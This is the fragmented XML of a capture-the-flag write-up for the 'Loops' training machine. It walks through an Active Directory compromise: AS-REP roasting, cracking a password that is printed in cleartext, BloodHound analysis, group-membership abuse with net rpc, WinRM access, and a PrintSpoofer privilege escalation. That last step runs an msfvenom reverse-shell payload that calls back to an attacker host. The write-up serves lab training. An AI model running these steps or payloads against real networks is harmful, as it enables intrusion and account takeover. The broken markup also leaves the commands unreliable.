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5puavvtz3ud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t4eq08hl5263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Loops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need support, please open a ticket in the.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1kuy7qxkzicg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Port enumeration was initiated on the machine to identify exposed services and potential attack vectors.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32513"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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5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enumeration identified TCP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(HTTP — default IIS page),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3389 (RDP)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5985 (WinRM)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open. When accessing the web application hosted on the machine, it was possible to view the application's homepage.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0433"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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43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performing directory and file brute forcing, a folder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uploads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discovered.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9600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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Inside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/uploads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the following file was identified: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Carta-Resultados-Financeiros-Q4-2021-Loops.pdf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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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was downloaded for local analysis.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http://&lt;machine-ip&gt;/uploads/Carta-Resultados-Financeiros-Q4-2021-Loops.pdf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8086"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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08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was analyzed using the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Exiftool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utility in order to extract metadata and hidden information from the document. Through this analysis,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 within the file metadata.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27713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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tool, it was verified that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has Kerberos pre-authentication enabled. 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Kerberos pre-authentication is a security mechanism that requires a user to prove their identity before receiving an authentication ticket. It prevents attackers from directly requesting hashes from the KDC to perform offline brute-force attacks.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95300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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result of the Kerberos pre-authentication verification, the hash content associated with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collected.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 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--asreproast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95300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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hash type was identified in order to crack the user’s password.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9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password for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successfully cracked, resulting in valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Mbase2#@!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8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obtained credentials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authentication was performed against network services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LDAP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 was validated.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 &lt;ip-machine&gt; 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'Mbase2#@!'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"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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eafa4mglr88z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authenticated LDAP access, the necessary files were collected and downloaded for import and analysis in </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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BloodHound,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enabling mapping of relationships and privilege escalation paths within Active Directory.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'Mbase2#@!'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--bloodhound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/home/&lt;your-user&gt;/.nxc/logs/WIN-VV3JMRJKLLG_172.16.2.5_2025-11-09_215956_bloodhound.zip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9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BloodHound web interface, the collected files were uploaded and Active Directory analysis was initiated.</w:t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95925" cy="4318238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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18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perform the upload, the previously generated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created by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containing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LDAP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-extracted information, was selected.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76875" cy="3842401"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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4240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uploading the files, the permissions assigned to the user were analyzed through the BloodHound interface.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6063"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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identified that the user has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Outbound Object Control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permission over the group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LOOPS_SECURITY.</w:t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53621"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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6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permission corresponds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AddMember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right, which allows adding users to a specific group, enabling inclusion of accounts into higher-privileged groups.</w:t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9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net rpc command, it was possible to add the compromised user to the group.</w:t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995863" cy="4095750"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9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095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compromised user was added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LOOPS_SECURITY_GROUP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is a member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MANAGEMENT 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group. This association grants the user remote access permission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command execution on the target machine.</w:t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71600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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addmem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"LOOPS_SECURITY_GROUP"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"mo.gasner"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'loops.local'/'mo.gasner'%'Mbase2#@!'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"&lt;ip-machine&gt;"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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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Subsequently, a remote connection was established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 (TCP/5985)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the target host.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'Mbase2#@!'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41763"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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ubdmtbydhgk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Our user was added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IIS_IUSRS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group, which possesses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SeImpersonatePrivilege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token impersonation and potential privilege escalation.</w:t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</w:t>
      </w:r>
      <w:hyperlink r:id="rId3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https://learn.microsoft.com/pt-br/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege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addmem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"IIS_IUSRS"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"mo.gasner"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'loops.local'/'mo.gasner'%'Mbase2#@!'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69900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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/priv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8413"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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4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obtain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privileges within the environment, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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PrintSpoofer.exe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binary was used, executing a call to a previously created reverse shell.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msfvenom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windows/x64/shell_reverse_tcp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LHOST=&lt;vpn-ip&gt;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LPORT=&lt;your-port&gt;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reverse.exe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establishing the authenticated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session, the required binaries for exploitation were transferred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Evil-WinRM’s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native upload functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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PrintSpoofer64.exe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reverse.exe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PrintSpoofer.exe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binary was executed, specifying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the command to be invoked in the privileged context:</w:t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./PrintSpoofer64.exe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'C:\Users\mo.gasner\Documents\reverse.exe'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048250" cy="1990725"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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90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result, it was possible to obtain the final flag located on the Administrator’s desktop at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C:\Users\Administrator\Desktop.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId41" w:type="default"/>
      <w:headerReference r:id="rId42" w:type="first"/>
      <w:headerReference r:id="rId43" w:type="even"/>
      <w:footerReference r:id="rId44" w:type="default"/>
      <w:footerReference r:id="rId45" w:type="first"/>
      <w:footerReference r:id="rId4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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.t3xzan5txiiq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7" name="image26.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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0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1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Loops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28.png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22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId45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7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hyperlink" Target="https://app.hackingclub.com/training/training-machines/69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29.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learn.microsoft.com/pt-br/troubleshoot/windows-server/windows-security/seimpersonateprivilege-secreateglobalprivilege" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exiftool.org/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/itm4n/PrintSpoofer" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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3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VrM7vZE6HMwPrNYA+C1B/koXg==">CgMxLjAyDmguNXB1YXZ2dHozdWR3Mg5oLnQ0ZXEwOGhsNTI2MzIOaC4xa3V5N3F4a3ppY2cyDmguZWFmYTRtZ2xyODh6Mg5oLnViZG10YnlkaGdrNTIOaC50M3h6YW41dHhpaXE4AHIhMUpYQ2lWMXFSLWoycWxFYWdEYnhWTkRpdHVTUWE2SFFo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